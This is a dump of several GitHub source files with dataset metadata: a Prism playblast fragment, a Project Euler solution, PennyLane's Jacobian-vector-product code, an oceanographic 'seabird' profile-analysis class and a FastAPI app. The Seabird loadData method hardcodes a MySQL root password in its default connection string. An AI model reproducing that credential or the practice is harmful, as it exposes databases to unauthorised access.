self.l_pathLast.text().replace(\"\\\\\", \"/\"),\n \"stateenabled\": str(self.state.checkState(0)),\n \"outputformat\": str(self.cb_formats.currentText()),\n }\n )\n return stateProps\n","repo_name":"RichardFrangenberg/Prism","sub_path":"Prism/Scripts/ProjectScripts/StateManagerNodes/default_Playblast.py","file_name":"default_Playblast.py","file_ext":"py","file_size_in_byte":22064,"program_lang":"python","lang":"en","doc_type":"code","stars":267,"dataset":"github-code","pt":"52"} +{"seq_id":"2055069745","text":"import math\r\nif __name__ == '__main__':\r\n outcomes = []\r\n n = 100\r\n for a in range(2,n+1):\r\n for b in range(2,n+1):\r\n outcome = math.pow(a,b)\r\n if not outcome in outcomes:\r\n outcomes.append(outcome)\r\n outcomes = sorted(outcomes)\r\n print(len(outcomes), outcomes)","repo_name":"dominic-lam/project_relue","sub_path":"problem_029.py","file_name":"problem_029.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31503893252","text":"import numpy as np\n\nimport pennylane as qml\nfrom pennylane.measurements import ProbabilityMP\n\n\ndef compute_jvp_single(tangent, jac):\n r\"\"\"Convenience function to compute the Jacobian vector product for a given\n tangent vector and a Jacobian for a single measurement tape.\n\n Args:\n tangent (list, tensor_like): tangent vector\n jac (tensor_like, tuple): Jacobian matrix\n\n Returns:\n tensor_like: the Jacobian vector product\n\n **Examples**\n\n We start with a number of examples. A more complete, technical description is given\n further below.\n\n 1. For a single parameter and a single measurement without shape (e.g. ``expval``, ``var``):\n\n .. code-block:: pycon\n\n >>> tangent = np.array([1.0])\n >>> jac = np.array(0.2)\n >>> qml.gradients.compute_jvp_single(tangent, jac)\n np.array(0.2)\n\n 2. For a single parameter and a single measurement with shape (e.g. ``probs``):\n\n .. code-block:: pycon\n\n >>> tangent = np.array([2.0])\n >>> jac = np.array([0.3, 0.4])\n >>> qml.gradients.compute_jvp_single(tangent, jac)\n np.array([0.6, 0.8])\n\n 3. For multiple parameters (in this case 2 parameters) and a single measurement\n without shape (e.g. ``expval``, ``var``):\n\n .. code-block:: pycon\n\n >>> tangent = np.array([1.0, 2.0])\n >>> jac = tuple([np.array(0.1), np.array(0.2)])\n >>> qml.gradients.compute_jvp_single(tangent, jac)\n np.array(0.5)\n\n 4. For multiple parameters (in this case 2 parameters) and a single measurement with\n shape (e.g. ``probs``):\n\n .. code-block:: pycon\n\n >>> tangent = np.array([1.0, 0.5])\n >>> jac = tuple([np.array([0.1, 0.3]), np.array([0.2, 0.4])])\n >>> qml.gradients.compute_jvp_single(tangent, jac)\n np.array([0.2, 0.5])\n\n .. details::\n :title: Technical description\n :href: technical-description\n\n There are multiple case distinctions in this function, for particular examples see above.\n\n - The JVP may be for one **(A)** or multiple **(B)** parameters. We call the number of\n parameters ``k``\n\n - The number ``R`` of tape return type dimensions may be between 0 and 3.\n We call the return type dimensions ``r_j``\n\n - Each parameter may have an arbitrary number ``L_i>=0`` of dimensions\n\n In the following, ``(a, b)`` denotes a tensor_like of shape ``(a, b)`` and ``[(a,), (b,)]``\n / ``((a,), (b,))`` denotes a ``list`` / ``tuple`` of tensors with the indicated shapes,\n respectively. Ignore the case of no trainable parameters, as it is filtered out in advance.\n\n For scenario **(A)**, the input shapes can be in\n\n .. list-table::\n :widths: 30 40 30\n :header-rows: 1\n\n * - ``tangent`` shape\n - ``jac`` shape\n - Comment\n * - ``(1,)`` or ``[()]`` or ``(())``\n - ``()``\n - scalar return, scalar parameter\n * - ``(1,)`` or ``[()]`` or ``(())``\n - ``(r_1,..,r_R)``\n - tensor return, scalar parameter\n * - ``[(l_1,..,l_{L_1})]`` [1]\n - ``(l_1,..,l_{L_1})``\n - scalar return, tensor parameter\n * - ``[(l_1,..,l_{L_1})]`` [1]\n - ``(r_1,..,r_R, l_1,..,l_{L_1})``\n - tensor return, tensor parameter\n\n [1] Note that intuitively, ``tangent`` could be allowed to be a tensor of shape\n ``(l_1,..,l_{L_1})`` without an outer list. However, this is excluded in order\n to allow for the distinction from scenario **(B)**. Internally, this input shape for\n ``tangent`` never occurs for scenario **(A)**.\n\n In this scenario, the tangent is reshaped into a one-dimensional tensor with shape\n ``(tangent_size,)`` and the Jacobian is reshaped to have the dimensions\n ``(r_1, ... r_R, tangent_size)``. This is followed by a ``tensordot`` contraction over the\n ``tangent_size`` axis of both tensors.\n\n For scenario **(B)**, the input shapes can be in\n\n .. list-table::\n :widths: 30 40 30\n :header-rows: 1\n\n * - ``tangent`` shape\n - ``jac`` shape\n - Comment\n * - ``(k,)`` or ``[(),..,()]`` or ``((),..,())``\n - ``((),..,())`` (length ``k``)\n - scalar return, ``k`` scalar parameters\n * - ``(k,)`` or ``[(),..,()]`` or ``((),..,())``\n - ``((r_1,..,r_R),..,(r_1,..,r_R))`` [1]\n - tensor return, ``k`` scalar parameters\n * - ``[(l_1,..,l_{L_1}),..,(l_1,..,l_{L_k})]``\n - ``((l_1,..,l_{L_1}),..,(l_1,..,l_{L_k}))``\n - scalar return, ``k`` tensor parameters\n * - ``[(l_1,..,l_{L_1}),..,(l_1,..,l_{L_k})]``\n - ``((r_1,..,r_R, l_1,..,l_{L_1}),..,(r_1,..,r_R, l_1,..,l_{L_k}))`` [1]\n - tensor return, ``k`` tensor parameters\n\n [1] Note that the return type dimensions ``(r_1,..,r_R)`` are the same for all entries\n of ``jac``, whereas the dimensions of the entries in ``tanget``, and the according\n dimensions ``(l_1,..,l_{L_k})`` of the ``jac`` entries may differ.\n\n In this scenario, another case separation is used: If any of the parameters is a\n tensor (i.e. not a scalar), all tangent entries are reshaped into one-dimensional\n tensors with shapes ``(tangent_size_i,)`` and then stacked into one one-dimensional tensor.\n If there are no tensor parameters, the tangent is just stacked and reshaped.\n The Jacobians are reshaped to have the dimensions ``(r_1, ... r_R, tangent_size_i)``\n and then are concatenated along their last (potentially mismatching) axis.\n This is followed by a tensordot contraction over the axes of size\n :math:`\\sum_i` ``tangent_size_i``.\n\n \"\"\"\n if jac is None:\n return None\n single_param = not isinstance(jac, tuple)\n if (single_param and jac.shape == (0,)) or (not single_param and len(jac) == 0):\n # No trainable parameters\n return qml.math.zeros((1, 0))\n\n if single_param:\n tangent = qml.math.stack(tangent)\n first_tangent_ndim = len(tangent.shape[1:])\n tangent = qml.math.flatten(tangent)\n tangent_size = tangent.shape[0]\n shape = jac.shape\n new_shape = shape[: len(shape) - first_tangent_ndim] + (tangent_size,)\n jac = qml.math.cast(qml.math.convert_like(jac, tangent), tangent.dtype)\n jac = qml.math.reshape(jac, new_shape)\n return qml.math.tensordot(jac, tangent, [[-1], [0]])\n\n tangent_ndims = [getattr(t, \"ndim\", 0) for t in tangent]\n if isinstance(tangent, (tuple, list)) and any(ndim > 0 for ndim in tangent_ndims):\n # At least one tangent entry is not a scalar, requiring us to flatten them and hstack\n tangent = [qml.math.flatten(t) for t in tangent]\n tangent_sizes = [t.shape[0] for t in tangent]\n tangent = qml.math.hstack(tangent)\n else:\n # Only scalar tangent entries, no flattening required and we may use stack\n tangent_sizes = [1] * len(tangent)\n tangent = qml.math.stack(tangent)\n jac_shapes = [j.shape for j in jac]\n new_shapes = [\n shape[: len(shape) - t_ndim] + (tsize,)\n for shape, t_ndim, tsize in zip(jac_shapes, tangent_ndims, tangent_sizes)\n ]\n jac = qml.math.concatenate([qml.math.reshape(j, s) for j, s in zip(jac, new_shapes)], axis=-1)\n jac = qml.math.cast(qml.math.convert_like(jac, tangent), tangent.dtype)\n return qml.math.tensordot(jac, tangent, [[-1], [0]])\n\n\ndef compute_jvp_multi(tangent, jac):\n \"\"\"Convenience function to compute the Jacobian-vector product for a given\n vector of gradient outputs and a Jacobian for a tape with multiple measurements.\n\n Args:\n tangent (tensor_like, list): tangent vector\n jac (tensor_like, tuple): Jacobian matrix\n\n Returns:\n tensor_like: the Jacobian-vector product\n\n **Examples**\n\n 1. For a single parameter and multiple measurements (one without shape and one with shape, e.g. expval and probs):\n\n .. code-block:: pycon\n\n >>> tangent = np.array([2.0])\n >>> jac = tuple([np.array([0.3]), np.array([0.2, 0.5])])\n >>> qml.gradients.compute_jvp_multi(tangent, jac)\n (np.array([0.6]), np.array([0.4, 1. ]))\n\n 2. For multiple parameters (in this case 2 parameters) and multiple measurements (one without shape and one with\n shape, e.g. expval and probs):\n\n .. code-block:: pycon\n\n >>> tangent = np.array([1.0, 2.0])\n >>> jac = tuple([tuple([np.array([0.3]), np.array([0.4])]), tuple([np.array([0.2, 0.5]), np.array([0.3, 0.8])]),])\n >>> qml.gradients.compute_jvp_multi(tangent, jac)\n (np.array([1.1]), np.array([0.8, 2.1]))\n \"\"\"\n if jac is None:\n return None\n return tuple(compute_jvp_single(tangent, j) for j in jac)\n\n\ndef jvp(tape, tangent, gradient_fn, gradient_kwargs=None):\n r\"\"\"Generate the gradient tapes and processing function required to compute\n the Jacobian vector product of a tape. This function only works with the new return type system on.\n\n Args:\n tape (.QuantumTape): quantum tape to differentiate\n tangent (tensor_like, list): Gradient-output vector. Must have shape\n matching the number of trainable parameters.\n gradient_fn (callable): the gradient transform to use to differentiate\n the tape\n gradient_kwargs (dict): dictionary of keyword arguments to pass when\n determining the gradients of tapes\n\n Returns:\n tensor_like or tuple or None: Jacobian vector product. Returns None if the tape\n has no trainable parameters.\n\n **Example**\n\n Consider the following quantum tape with Jax parameters:\n\n .. code-block:: python\n\n import jax\n\n x = jax.numpy.array([[0.1, 0.2, 0.3],\n [0.4, 0.5, 0.6]])\n\n ops = [\n qml.RX(x[0, 0], wires=0),\n qml.RY(x[0, 1], wires=1),\n qml.RZ(x[0, 2], wires=0),\n qml.CNOT(wires=[0, 1]),\n qml.RX(x[1, 0], wires=1),\n qml.RY(x[1, 1], wires=0),\n qml.RZ(x[1, 2], wires=1)\n ]\n measurements = [qml.expval(qml.PauliZ(0)), qml.probs(wires=1)]\n tape = qml.tape.QuantumTape(ops, measurements)\n\n We can use the ``jvp`` function to compute the Jacobian vector product,\n given a tangent vector ``tangent``:\n\n >>> tangent = [jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0)]\n >>> jvp_tapes, fn = qml.gradients.jvp(tape, tangent, qml.gradients.param_shift)\n\n Note that ``tangent`` has six elements, matching the parameter dimension of the tape.\n\n Executing the JVP tapes, and applying the processing function:\n\n >>> dev = qml.device(\"default.qubit\", wires=2)\n >>> jvp = fn(dev.execute(jvp_tapes))\n >>> jvp\n (Array(-0.62073976, dtype=float32), Array([-0.3259707 , 0.32597077], dtype=float32))\n \"\"\"\n if len(tape.trainable_params) == 0:\n # The tape has no trainable parameters; the JVP\n # is simply none.\n return [], lambda _, num=None: None\n\n multi_m = len(tape.measurements) > 1\n\n try:\n # if qml.math.allclose(qml.math.stack(tangent), 0):\n if qml.math.allclose(tangent, 0):\n # If the tangent vector is zero, then the\n # corresponding element of the JVP will be zero,\n # and we can avoid a quantum computation.\n\n def func(_): # pylint: disable=unused-argument\n # TODO: Update shape for CV variables and for qutrit simulations\n res = tuple(_single_measurement_zero(m, tangent) for m in tape.measurements)\n if not multi_m:\n res = res[0]\n return res\n\n return [], func\n except (AttributeError, TypeError):\n pass\n\n gradient_kwargs = gradient_kwargs or {}\n gradient_tapes, fn = gradient_fn(tape, **gradient_kwargs)\n\n def processing_fn(results):\n # postprocess results to compute the Jacobian\n jac = fn(results)\n _jvp_fn = compute_jvp_multi if multi_m else compute_jvp_single\n\n # Jacobian without shot vectors\n if not tape.shots.has_partitioned_shots:\n return _jvp_fn(tangent, jac)\n\n # The jacobian is calculated for shot vectors\n return tuple(_jvp_fn(tangent, jac[i]) for i in range(tape.shots.num_copies))\n\n return gradient_tapes, processing_fn\n\n\ndef batch_jvp(tapes, tangents, gradient_fn, reduction=\"append\", gradient_kwargs=None):\n r\"\"\"Generate the gradient tapes and processing function required to compute\n the Jacobian vector products of a batch of tapes.\n\n Args:\n tapes (Sequence[.QuantumTape]): sequence of quantum tapes to differentiate\n tangents (Sequence[tensor_like]): Sequence of gradient-output vectors ``dy``. Must be the\n same length as ``tapes``. Each ``dy`` tensor should have shape\n matching the output shape of the corresponding tape.\n gradient_fn (callable): the gradient transform to use to differentiate\n the tapes\n reduction (str): Determines how the Jacobian-vector products are returned.\n If ``append``, then the output of the function will be of the form\n ``List[tensor_like]``, with each element corresponding to the JVP of each\n input tape. If ``extend``, then the output JVPs will be concatenated.\n gradient_kwargs (dict): dictionary of keyword arguments to pass when\n determining the gradients of tapes\n\n Returns:\n List[tensor_like or None]: list of Jacobian vector products. ``None`` elements corresponds\n to tapes with no trainable parameters.\n\n **Example**\n\n .. code-block:: python\n\n import jax\n x = jax.numpy.array([[0.1, 0.2, 0.3],\n [0.4, 0.5, 0.6]])\n\n ops = [\n qml.RX(x[0, 0], wires=0),\n qml.RY(x[0, 1], wires=1),\n qml.RZ(x[0, 2], wires=0),\n qml.CNOT(wires=[0, 1]),\n qml.RX(x[1, 0], wires=1),\n qml.RY(x[1, 1], wires=0),\n qml.RZ(x[1, 2], wires=1)\n ]\n measurements1 = [qml.expval(qml.PauliZ(0)), qml.probs(wires=1)]\n tape1 = qml.tape.QuantumTape(ops, measurements1)\n\n measurements2 = [qml.expval(qml.PauliZ(0) @ qml.PauliZ(1))]\n tape2 = qml.tape.QuantumTape(ops, measurements2)\n\n tapes = [tape1, tape2]\n\n Both tapes share the same circuit ansatz, but have different measurement outputs.\n\n We can use the ``batch_jvp`` function to compute the Jacobian vector product,\n given a list of tangents ``tangent``:\n\n >>> tangent_0 = [jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0)]\n >>> tangent_1 = [jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0), jax.numpy.array(1.0)]\n >>> tangents = [tangent_0, tangent_1]\n\n Note that each ``tangents`` has shape matching the parameter dimension of the tape.\n\n Executing the JVP tapes, and applying the processing function:\n\n >>> jvp_tapes, fn = qml.gradients.batch_jvp(tapes, tangents, qml.gradients.param_shift)\n\n >>> dev = qml.device(\"default.qubit\", wires=2)\n >>> jvps = fn(dev.execute(jvp_tapes))\n >>> jvps\n ((Array(-0.62073976, dtype=float32), Array([-0.3259707 , 0.32597077], dtype=float32)), Array(-0.6900841, dtype=float32))\n\n We have two JVPs; one per tape. Each one corresponds to the shape of the output of their respective tape.\n \"\"\"\n # pylint: disable=too-many-arguments\n gradient_kwargs = gradient_kwargs or {}\n reshape_info = []\n gradient_tapes = []\n processing_fns = []\n\n # Loop through the tapes and dys vector\n for tape, tangent in zip(tapes, tangents):\n g_tapes, fn = jvp(tape, tangent, gradient_fn, gradient_kwargs)\n\n reshape_info.append(len(g_tapes))\n processing_fns.append(fn)\n gradient_tapes.extend(g_tapes)\n\n def processing_fn(results):\n jvps = []\n start = 0\n\n for t_idx in range(len(tapes)):\n # extract the correct results from the flat list\n res_len = reshape_info[t_idx]\n res_t = results[start : start + res_len]\n start += res_len\n\n # postprocess results to compute the JVP\n jvp_ = processing_fns[t_idx](res_t)\n\n if jvp_ is None:\n if reduction == \"append\":\n jvps.append(None)\n continue\n\n if isinstance(reduction, str):\n getattr(jvps, reduction)(jvp_)\n elif callable(reduction):\n reduction(jvps, jvp_)\n\n return tuple(jvps)\n\n return gradient_tapes, processing_fn\n\n\ndef _single_measurement_zero(m, tangent):\n \"\"\"Aux function to create a zero tensor from a measurement.\"\"\"\n dim = 2 ** len(m.wires) if isinstance(m, ProbabilityMP) else ()\n res = qml.math.convert_like(np.zeros(dim), tangent)\n res = qml.math.cast_like(res, tangent)\n return res\n","repo_name":"PennyLaneAI/pennylane","sub_path":"pennylane/gradients/jvp.py","file_name":"jvp.py","file_ext":"py","file_size_in_byte":17262,"program_lang":"python","lang":"en","doc_type":"code","stars":1965,"dataset":"github-code","pt":"52"} +{"seq_id":"4660991280","text":"\"\"\"\nSeabird Class\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .tools.seabird_preprocessing import preprocessing as seabird_pp\nfrom .tools.seabird_parser import seabird_file_parser\nfrom .thermocline import thermocline\nfrom .deepChlLayers import DCL\n\nclass seabird:\n\tdef __init__(self, config):\n\t\t\"\"\"\n\t\tArgs: \n\t\t\tconfig: dictionary, configuration\n\t\t\"\"\"\n\t\tself.data_file = None\n\t\tself.config=config\n\n\t\t# create THM and DCL model\n\t\tself.thermocline = thermocline(config)\n\t\tself.DCL = DCL(config)\n\n\t\t# site information\n\t\tself.time = None\n\t\tself.site = None\n\t\tself.ID = None\n\t\tself.fileId = None # file id\n\n\t\tself.downCastRawData= None\n\t\tself.rawData = None\n\t\tself.cleanData = None\n\t\t\n\t\tself.features = None\n\t\tself.expert = {\"TRM\":None,\"LEP\":None,\"UHY\":None,\"DCL\":None} # expert notes\n\t\t\n\t\tself.saveModel = False\n\t\tself.waterChemistry = {}\n\n\t\t# self.bottleData = None\n\t\t# self.bottleFile = None # maybe useful\n\n\tdef loadData(self,dataFile = None, fileId = None, dbEngine = None, columns = None):\n\t\t\"\"\"\n\t\tLoad data into the Seabird Class\n\t\tArgs:\n\t\t\tdataFile: seabird raw file, cnv or csv file\n\t\t\tfileId: Id in the database, should not used in application\n\t\t\tdbEngine: database engine\n\t\tReturns:\n\n\t\t\"\"\"\n\t\tif fileId is None:\n\t\t\t# read from the seabird raw data.\n\t\t\tparser = seabird_file_parser()\n\t\t\tparser.readFile(dataFile, columns = columns)\n\t\t\tsensorData = parser.sensordata\n\t\t\tself.time = parser.meta[\"systemUpLoadTime\"]\n\t\t\tself.site = parser.meta[\"stationInfered\"]\n\n\t\telse:\n\t\t\tfrom sqlalchemy import create_engine\n\t\t\tif dbEngine is None:\n\t\t\t\tdbEngine = create_engine('mysql+mysqldb://root:XuWenzhaO@localhost/Seabird')\n\t\t\t\n\t\t\tsql_data = \"Select * from summer_data where fileId = %d Order By 'index' ASC\" %(fileId)\n\t\t\tsensorData = pd.read_sql_query(sql_data,dbEngine).drop('index',axis = 1)\n\t\t\tsql_meta = \"Select * from summer_meta where fileId = %d\" %(fileId)\n\t\t\tmeta = pd.read_sql_query(sql_meta,dbEngine)\n\t\t\tself.time = meta[\"systemUpLoadTime\"][0]\n\t\t\tself.site = meta[\"stationInfered\"][0]\n\t\t\tself.fileId = fileId\n\t\t\n\t\tself.rawData = sensorData\n\t\n\n\tdef setExpert(self,notes):\n\t\t\"\"\"\n\t\tLoad operator judgements:\n\t\tArgs:\n\t\t\tnotes: a dictionary stored the depth values of keys of TRM, LEP, UHY and DCL\n\t\tReturns:\n\n\t\t\"\"\"\n\t\tself.expert[\"TRM\"] = notes[\"TRM\"]\n\t\tself.expert[\"LEP\"] = notes[\"LEP\"]\n\t\tself.expert[\"UHY\"] = notes[\"UHY\"]\n\t\tself.expert[\"DCL\"] = notes[\"DCL\"]\n\n\tdef updateConfig(self,new_config):\n\t\t\"\"\"\n\t\tFunction to update configuration, useful when users want to change configurations\n\t\tinteractively\n\t\tArgs:\n\t\t\tnew_config: the new configuration dictionary\n\t\t\"\"\"\n\t\tself.config=new_config\n\t\tself.thermocline = thermocline(new_config)\n\t\tself.DCL = DCL(new_config)\n\t\tself.features = None\n\n\tdef preprocessing(self):\n\t\t\"\"\"\n\t\tFunction to do preprocess the data, including separating and smoothing\n\t\t\"\"\"\n\t\tself.downCastRawData, self.cleanData = seabird_pp(self.rawData, self.config[\"Preprocessing\"])\n\t\t\n\n\tdef identify(self,saveModel = True):\n\t\t\"\"\"\n\t\tFunction to identify features of DCL and TRM\n\t\t\"\"\"\n\t\tself.saveModel = saveModel\n\n\t\t# detect TRM features\n\n\t\tTRM_features = self.thermocline.detect(data = self.cleanData[[\"Depth\",\"Temperature\"]],\\\n\t\t saveModel = saveModel)\n\n\t\tif TRM_features[\"LEP_segment\"] is None:\n\t\t\tpeakMinDepth = 0\n\t\t\tpeakUpperDepthBoundary = 0\n\t\telse:\n\t\t\tpeakMinDepth = TRM_features[\"LEP_segment\"]\n\t\t\tpeakUpperDepthBoundary =TRM_features[\"LEP_segment\"]\n\t\t# detect DCL features\n\t\tDCL_features = self.DCL.detect(data = self.cleanData[[\"Depth\",\"Fluorescence\"]],\\\n\t\t\t\t\t\t\t\t\t rawData = self.downCastRawData[[\"Depth\",\"Fluorescence\"]],\\\n\t\t peakMinDepth = peakMinDepth,\\\n\t\t peakUpperDepthBoundary = peakUpperDepthBoundary,\\\n\t\t saveModel = saveModel)\n\n\t\tself.features = TRM_features.copy()\n\t\tself.features.update(DCL_features) # add DCL features\n\n\tdef plot(self, legend=True, pt=None, filename=None,meta=True):\n\t\t\"\"\"\n\t\tFunction to plot the results\n\t\tArgs:\n\t\t\tLegend: whether to plot DCL and TRM features\n\t\t\tpt: the plot canvas\n\t\t\tfilename: the file name plot to be saved. None means don't save\n\t\t\tmeta: whether to plot meta information such as the curve and segments fitted\n\t\tReturns:\n\t\t\tNone\n\t\t\"\"\"\n\t\tif pt is None:\n\t\t\tpt = plt.figure(figsize=(6, 7), dpi=80)\n\n\t\t# plot the depth profile\n\t\tax1 = pt.add_subplot(111) # ax1 is the temperature axis\n\t\tax2 = ax1.twiny()\t# ax2 is the fluorescence axis\n\n\t\t# plot the raw Temperature data\n\t\tax1.plot(self.cleanData.Temperature, -self.cleanData.Depth, \"r\")\n\t\tax1.plot(self.downCastRawData.Temperature, -self.downCastRawData.Depth, \"r--\", alpha=0.5)\n\t\tax1.set_xlabel(\"Temperature (C)\")\n\t\tax1.set_ylabel(\"Depth (m)\")\n\t\tax1.set_ylim((-max(self.cleanData.Depth) - 5, 0))\n\t\t\n\t\tif legend == False: # Don't plot thermocline and DCL identification\n\t\t\tpass;\n\n\t\telse:\n\t\t\tcolors = [\"r\",\"b\",\"y\",\"g\"]\n\n\t\t\t# plot the depth of TRM data\n\t\t\tfor i,depth in enumerate([self.features[\"TRM_segment\"],self.features[\"LEP_segment\"],self.features[\"UHY_segment\"]]):\n\t\t\t\tax1.axhline(y = -1*depth if depth is not None else -999,color = colors[i])\n\n\t\t\tif meta:\n\t\t\t\t# plot HMM results for comparison\n\t\t\t\tfor i,depth in enumerate([self.features[\"TRM_HMM\"],self.features[\"LEP_HMM\"],self.features[\"UHY_HMM\"]]):\n\t\t\t\t\tax1.axhline(y = -1*depth if depth is not None else -999,color = colors[i],ls = \":\")\n\n\t\t\t# plot expert judgement\n\t\t\tfor i,depth in enumerate([self.expert[\"TRM\"],self.expert[\"LEP\"],self.expert[\"UHY\"],self.expert[\"DCL\"]]):\n\t\t\t\tax1.axhline(y = -1*depth if depth is not None else -999,color = colors[i],ls=\"--\")\n\n\n\t\t\tif self.saveModel and meta:\n\t\t\t\t# plot all the fitted segments\n\t\t\t\tfor seg in self.thermocline.models[\"segmentation\"].segmentList:\n\t\t\t\t\tax1.plot(seg[0],-np.array(self.cleanData.Depth[seg[1]]))\n\n\t\t\txlimRange = (\n\t\t\t\tnp.percentile(self.downCastRawData[\"Fluorescence\"][self.downCastRawData.Depth > 2],5) * 0.95,\n\t\t\t\tnp.percentile(self.downCastRawData[\"Fluorescence\"][self.downCastRawData.Depth > 2],99) * 1.3)\n\n\t\t\t# plot fluorescence \n\t\t\tif max(xlimRange)>0.01:\n\t\t\t\tax2.set_xlim(xlimRange)\n\t\t\t\tax2.set_xlabel(\"Fluorescence (ug/L)\")\n\t\t\t\tax2.plot(self.cleanData.Fluorescence, -self.cleanData.Depth, \"g\")\n\t\t\t\tax2.plot(self.downCastRawData.Fluorescence, -self.downCastRawData.Depth, \"g--\", alpha=0.5)\n\t\t\t\t\n\t\t\t\tif self.saveModel and meta:\n\t\t\t\t\tmeta_allPeaks = self.DCL.model.allPeaks\n\n\t\t\t\t\tif meta_allPeaks is not None:\n\t\t\t\t\t\tfor i in range(len(meta_allPeaks[\"peakIndex\"])):\n\t\t\t\t\t\t\t# plot the fitted shape\n\t\t\t\t\t\t\tleftShapeFit = meta_allPeaks[\"leftShapeFit\"][i]\n\t\t\t\t\t\t\trightShapeFit = meta_allPeaks[\"rightShapeFit\"][i]\n\n\t\t\t\t\t\t\tpeakIndex = meta_allPeaks[\"peakIndex\"][i]\n\n\t\t\t\t\t\t\tleftShapeIndex = range(peakIndex-len(leftShapeFit)+1,peakIndex+1)\n\t\t\t\t\t\t\trightShapeIndex = range(peakIndex,peakIndex+len(rightShapeFit))\n\t\t\t\t\t\t\tprint(leftShapeIndex)\n\t\t\t\t\t\t\tprint(rightShapeIndex)\n\t\t\t\t\t\t\tax2.plot(leftShapeFit,-self.cleanData.Depth.iloc[leftShapeIndex])\n\t\t\t\t\t\t\tax2.plot(rightShapeFit,-self.cleanData.Depth.iloc[rightShapeIndex])\n\n\t\t\t\t# if detected DCL, plo the depth of the DCL peak\n\t\t\t\tif self.features[\"DCL_depth\"] is not None:\n\t\t\t\t\tax2.axhline(y=-self.features[\"DCL_depth\"],color=\"g\")\n\t\t\t\t\tax2.axhline(y=-self.features[\"DCL_upperDepth_fit\"],color = \"g\")\n\t\t\t\t\tax2.axhline(y=-self.features[\"DCL_bottomDepth_fit\"],color = \"g\")\n\t\t\t\t\t# ax2.axhline(y=-self.features[\"DCL_upperDepth_gradient\"],color = \"m\")\n\t\t\t\t\t# ax2.axhline(y=-self.features[\"DCL_bottomDepth_gradient\"],color = \"m\")\n\n\t\tif filename is None:\n\t\t\tpass\n\t\telse:\n\t\t\tplt.savefig(filename)\n\t\t\tplt.close()\n\n\n\tdef plot_all(self, interestVarList=None, fileTitle=None):\n\t\t# Function to plot all water chemistry\n\t\tfrom mpl_toolkits.axes_grid1 import host_subplot\n\t\timport mpl_toolkits.axisartist as AA\n\n\t\t# create a map from water feature to plot line color \n\t\tcol = dict(zip([\"Temperature\", \"DO\", \"Specific_Conductivity\", \"Fluorescence\", \"Beam_Attenuation\", \"Par\"],\n\t\t [\"r\", \"b\", \"y\", \"g\", \"m\", \"k\"]))\n\n\t\tif interestVarList is None:\n\t\t\t# interestVarList = self.cleanData.columns.values\n\t\t\tinterestVarList=[\"Temperature\", \"DO\", \"Specific_Conductivity\", \"Fluorescence\", \"Beam_Attenuation\", \"Par\"]\n\n\t\tplt.figure(figsize=[8, 10])\n\t\thost = host_subplot(111, axes_class=AA.Axes)\n\t\tplt.subplots_adjust(top=0.75, bottom=0.2)\n\n\t\tnum_axis = len(interestVarList) - 1\n\t\toffset = 23\n\n\t\tparList = []\n\n\t\tfor i in range(num_axis):\n\t\t\tpar = host.twiny()\n\t\t\tnew_fixed_axis = par.get_grid_helper().new_fixed_axis\n\t\t\tpar.axis[\"top\"] = new_fixed_axis(loc=\"top\", axes=par, offset=(0, offset))\n\t\t\tpar.axis[\"top\"].toggle(all=True)\n\t\t\tparList.append(par)\n\t\t\toffset += 35\n\n\t\tp0, = host.plot(self.downCastRawData.Temperature, -self.downCastRawData.Depth, col[\"Temperature\"] + \"+-\", label=\"Temperature\")\n\n\t\tfor index, var in enumerate(interestVarList[1:]):\n\t\t\tpar = parList[index]\n\t\t\tp, = par.plot(self.downCastRawData[var], -self.downCastRawData.Depth, col[var] + \"+-\",\n\t\t\t label=var)\n\t\t\tpar.set_xlabel(var)\n\t\t\tpar.set_xlim(\n\t\t\t\t(np.percentile(self.downCastRawData[var][(self.downCastRawData.Depth > 3)], 5) * 0.95 \n\t\t\t\t ,\n\t\t\t\t np.percentile(self.downCastRawData[var][(self.downCastRawData.Depth > 3)], 95) * 1.05 * 2))\n\n\t\t\tpar.axis[\"top\"].label.set_color(p.get_color())\n\n\t\thost.legend(bbox_to_anchor=(0., -0.27, 1., 0), loc=8, borderaxespad=0.6, ncol=2, mode=\"expand\")\n\t\thost.axis[\"bottom\"].label.set_color(p0.get_color())\n\n\t\thost.set_xlabel(\"Temperature\")\n\t\thost.set_ylabel(\"Depth (m)\")\n\t\t# host.set_title(self.site + \"_\" + self.time)\n\t\thost.set_xlim((max(host.get_xlim()[0], 0), host.get_xlim()[1]))\n\t\thost.set_ylim((host.get_ylim()[0], min(host.get_ylim()[1], 0),))\n\t\tif fileTitle is None:\n\t\t\tplt.show()\n\t\telse:\n\t\t\tplt.draw()\n\t\t\tplt.savefig(fileTitle)","repo_name":"stormxuwz/SeabirdCode","sub_path":"seabird/seabird_class.py","file_name":"seabird_class.py","file_ext":"py","file_size_in_byte":9701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"2013972099","text":"import asyncio\nimport signal\nfrom contextlib import asynccontextmanager\n\nfrom fastapi import FastAPI\nfrom fastapi.middleware import Middleware\n\nfrom internal.pkg.event_loop import EventLoop\nfrom internal.user_interface.restapi import middleware\nfrom internal.user_interface.restapi.controller import healthz\n\n\nclass RestAPI:\n def create_app(self):\n app = FastAPI(\n lifespan=self._lifespan,\n middleware=[\n Middleware(middleware.Logger),\n ],\n )\n\n app.include_router(healthz.router)\n\n return app\n\n @asynccontextmanager\n async def _lifespan(self, app: FastAPI):\n # Startup\n app.state.event_loop = EventLoop(\n startup=[],\n shutdown=[],\n closed=[self._raise_sigint],\n )\n app.state.event_loop.start()\n\n try:\n yield\n except asyncio.CancelledError:\n pass\n finally:\n # Shutdown\n app.state.event_loop.close()\n\n @staticmethod\n def _raise_sigint():\n signal.raise_signal(signal.SIGINT)\n","repo_name":"hhk7734/fastapi_test.py","sub_path":"internal/user_interface/restapi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} 